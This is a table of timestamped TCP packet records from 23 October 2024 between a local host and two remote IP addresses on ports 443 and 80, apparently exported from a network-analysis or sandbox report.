                                                                                                                                                                        Oct 23, 2024 17:27:02.442210913 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.442493916 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.442502975 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.442531109 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.442543030 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.442581892 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.442608118 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.442610025 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.442620993 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.442657948 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.443276882 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.443285942 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.443310976 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.443331957 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.443337917 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.443361044 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.443372011 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.443373919 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.443397999 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.443419933 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.444055080 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.444062948 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.444117069 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.444128036 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.444135904 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.444190979 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.447662115 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.447673082 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.447694063 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.447750092 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.447763920 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.447772980 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.448364019 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.448390007 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.448427916 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.448436975 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.448460102 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.449330091 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.449352980 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.449393034 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.449402094 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.449419022 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.450172901 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.450197935 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.450227022 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.450237989 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.450249910 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.450299025 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.450340986 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.450745106 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:15.678776026 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:15.684195995 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:15.684339046 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:15.684478998 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:15.690139055 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.568993092 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569022894 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569034100 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569329977 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.569386959 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569408894 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569422007 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569432974 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569447994 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569458961 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569466114 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.569469929 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.569484949 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.569510937 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.574902058 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.574930906 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.574944973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.575015068 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.709191084 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709213972 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709227085 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709328890 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.709467888 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709525108 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709579945 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709590912 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.709600925 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.709630013 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.710002899 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.710056067 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.710069895 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.710103989 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.710120916 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.710167885 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.729301929 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.729326010 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.729381084 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.729429960 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.729671955 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.729747057 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.828368902 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828393936 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828500986 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828564882 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828577042 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828588963 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828618050 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.828618050 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.828701973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.828923941 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.829464912 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.829477072 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.829488039 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.829555035 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.829799891 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.829812050 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.829857111 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.849289894 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.849317074 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.849329948 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.849411011 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.849416971 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.849595070 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.947623014 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.947721004 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.947731972 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.947743893 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.947757006 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.947880030 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.947880030 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.948143005 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.948223114 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.948234081 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.948254108 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.948312044 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.948312044 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.968518019 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.968595028 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.968609095 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.968710899 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.968727112 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:16.968885899 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:16.968885899 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.066409111 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.066452026 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.066623926 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.066895008 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.066994905 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067064047 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067076921 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067091942 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067106009 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.067106009 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.067331076 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.067497015 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067558050 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067568064 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.067620993 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.087691069 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.087706089 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.087718010 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.087769985 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.087820053 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.087831974 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.087858915 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.087858915 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.088323116 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.088340998 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.088409901 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.088409901 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.586044073 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.586462975 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.587224960 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.866082907 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.866096973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.866107941 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.866182089 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.866194010 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:17.866343975 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:17.866343975 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.008122921 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.008155107 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.008167028 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.008276939 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.008287907 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.008300066 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.008323908 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.008346081 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.008503914 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.008548975 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.008601904 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.147834063 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.147861004 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.147874117 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.148021936 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.148035049 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.148099899 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.148111105 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.148123026 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.148143053 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.148147106 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.148156881 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.148355007 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.148367882 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.148411989 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.149017096 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.149041891 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.149096012 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.266156912 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.266180992 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.266192913 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.266335011 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.287240028 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.287295103 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.287318945 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.287333012 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.287369013 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.287381887 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.287455082 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.287467957 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.287499905 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.287581921 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.287584066 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.287626982 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.288512945 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.288523912 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.288535118 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.288573027 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.288789988 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.288842916 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.288846970 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.288858891 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.288899899 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.385116100 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.385138988 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.385149956 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.385199070 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.429358959 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.429389954 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.429403067 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.429554939 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.429562092 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.429562092 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.429565907 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.429649115 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.429985046 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.430006981 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.430018902 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.430030107 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.430042982 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.430053949 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.430090904 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.430866957 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.430989027 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.431000948 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.431030035 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.504468918 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.504528046 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.504544973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.504621029 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.504656076 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.525366068 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.525419950 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.525543928 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.525583982 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.525602102 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.525660992 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.548518896 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.548599958 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.548614025 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.548639059 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.548655033 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.548660040 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.548696041 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.548777103 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.548793077 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.548821926 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.549654961 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.549701929 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.549706936 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.549720049 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.549782038 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.549951077 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.550015926 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.550031900 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.550060987 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.550107002 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.550154924 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.623132944 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.623193026 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.623256922 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.623297930 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.623606920 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.623670101 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.644803047 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.644849062 CEST804917385.215.206.82192.168.2.22
